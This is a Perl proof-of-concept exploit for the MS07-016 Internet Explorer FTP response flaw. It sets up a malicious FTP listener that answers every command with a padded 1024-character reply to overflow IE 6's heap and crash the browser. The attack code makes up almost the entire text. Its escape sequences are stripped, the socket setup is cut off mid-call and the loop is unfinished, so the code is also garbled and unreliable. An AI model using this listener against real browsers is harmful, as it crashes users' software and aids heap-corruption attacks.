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MS Internet Explorer (FTP Server Response) DoS Exploit


# MS 07-016 FTP Server Response PoC

# Usage: ./ [LISTEN_IP]


# Tested Against: MSIE 6.02900.2180 (SP2)


# Details: The response is broken into buffers, either at length 1024,

# or at 'rn'. Each buffer is apended with x00, without

# bounds checking. If the response is exctly 1024 characters

# in length, you will overflow the heap with the string x00.

use IO::Socket;

use strict;

# Create listener

my $ip=shift || '';

my $sock = IO::Socket::INET->new(Listen=>1,




$sock or die ("Could not create listener.nMake sure no FTP server is running, and you are running this as root.n");

# Wait for initial connection and send banner

my $sock_in = $sock->accept();

print $sock_in "220 waa waa wee waarn";

# Send response code with total lenght of response = 1024

while (<$sock_in>){

my $response;

if($_ eq "USER") { $response="331 ";}

elsif($_ eq "PASS") { $response="230 ";}

elsif($_ eq "syst") { $response="215 ";}

elsif($_ eq "CWD") { $response="250 ";}

elsif($_ eq "PWD") { $response="230 ";}

else { $response="200 ";}

print $sock_in $response."A"x(1024-length($response)-2)."rn";




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